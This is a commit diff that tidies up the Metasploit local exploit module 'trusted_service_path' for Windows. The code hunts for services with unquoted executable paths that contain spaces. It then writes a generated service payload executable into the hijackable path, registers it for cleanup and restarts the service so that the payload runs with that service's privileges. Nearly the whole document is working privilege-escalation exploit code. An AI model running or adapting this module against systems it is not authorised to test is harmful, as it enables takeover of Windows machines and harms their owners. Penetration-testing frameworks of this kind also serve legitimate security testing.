Tidyup trusted_service_path

Use filedropper, use service exe, dont migrate

modules/exploits/windows/local/trusted_service_path.rb

@@ -9,6 +9,7 @@ require 'msf/core/exploit/exe'
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::EXE
   include Msf::Post::File
   include Msf::Post::Windows::Services
@@ -44,10 +45,8 @@ class Metasploit3 < Msf::Exploit::Local
         ],
       'Platform'       => [ 'win'],
       'Targets'        => [ ['Windows', {}] ],
-      'SessionTypes'   => [ "shell", "meterpreter" ],
+      'SessionTypes'   => [ "meterpreter" ],
       'DefaultTarget'  => 0,
-      # Migrate away, in case the service dies (can kill access)
-      'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }
     ))
   end
 
@@ -77,8 +76,8 @@ class Metasploit3 < Msf::Exploit::Local
       next if cmd !~ /^[a-z]\:.+\.exe$/i
       next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true)
 
-      vprint_status("Found vulnerable service: #{name} - #{cmd} (#{info['Credentials']})")
+      vprint_status("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
-      vuln_services << [name, cmd]
+      vuln_services << [service[:name], cmd]
 
       # This process can be pretty damn slow.
       # Allow the user to just find one, and get the hell out.
@@ -95,63 +94,32 @@ class Metasploit3 < Msf::Exploit::Local
     #
     print_status("Finding a vulnerable service...")
     svrs = enum_vuln_services(true)
-    if svrs.empty?
+
-      print_error("No service found with trusted path issues")
+    fail_with(Failure::NotVulnerable, "No service found with trusted path issues") if svrs.empty?
-      return
-    end
 
     svr_name = svrs.first[0]
     fpath    = svrs.first[1]
     exe_path = "#{fpath.split(' ')[0]}.exe"
-    print_status("Placing #{exe_path} as #{svr_name}")
+    print_status("Placing #{exe_path} for #{svr_name}")
-
 
     #
     # Drop the malicious executable into the path
     #
-    exe = generate_payload_exe
+    exe = generate_payload_exe_service({:servicename=>svr_name})
     print_status("Writing #{exe.length.to_s} bytes to #{exe_path}...")
     begin
       write_file(exe_path, exe)
+      register_files_for_cleanup(exe_path)
     rescue Rex::Post::Meterpreter::RequestError => e
       # Can't write the file, can't go on
-      print_error(e.message)
+      fail_with(Failure::Unknown, e.message)
-      return
     end
 
-
     #
     # Run the service, let the Windows API do the rest
     #
     print_status("Launching service #{svr_name}...")
-    tried = false
+    service_restart(svr_name)
-    begin
-      status = service_start(svr_name)
-      raise RuntimeError, status if status != Error::SUCCESS
-    rescue RuntimeError => s
-      if tried
-        print_error("Unable to start #{svr_name}")
-        return
-      else
-        tried = true
-      end
-
-      case s.message.to_i
-      when Error::SERVICE_ALREADY_RUNNING
-        service_stop(svr_name)
-        retry
-      when Error::SERVICE_DISABLED
-        service_change_startup(svr_name, 'manual')
-        retry
-      end
-    end
-
-
-    #
-    # "Nothing ever happened, we swears it on the Precious!"
-    #
-    print_status("Deleting #{exe_path}")
-    file_rm(exe_path)
   end
 
 end